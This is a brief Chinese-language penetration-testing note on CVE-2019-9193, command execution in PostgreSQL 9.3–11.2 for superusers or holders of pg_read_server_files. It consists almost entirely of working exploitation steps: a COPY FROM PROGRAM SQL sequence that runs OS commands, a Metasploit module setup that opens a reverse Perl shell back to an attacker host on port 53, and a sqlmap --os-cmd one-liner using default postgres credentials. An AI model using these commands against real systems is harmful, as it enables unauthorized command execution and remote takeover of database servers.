(CVE-2019-9193)
CVE-2019-9193:PostpreSQL 9.3-11.2 允许经过身份验证的superuser或者拥有pg_read_server_files权限的用户执行任意命令:
drop table if exists cmd_exec;
create table cmd_exec(cmd_output text);
copy cmd_exec from program 'id';
select * from cmd_exec;
drop table if exists cmd_exec;
需要注意的是:命令中的单引号需要用双引号进行转义,如:echo 'test' >> 'echo "test";'
MSF中也有对应的利用模块:
use exploit/multi/postgres/postgres_cmd_execution_nine_three
set RHOST 192.168.1.5
set payload cmd/unix.reverse_perl
set database postgres
set username postgres
set password postgres
set LHOST 192.168.1.6
set LPORT 53
exploit
参考链接:http://t3ngyu.leanote.com/post/Postgresql
UDF提权
sqlmap -d "PostgreSQL://postgres:postgres@192.168.0.13:5432/postgres" --os-cmd id
sqlmap yyds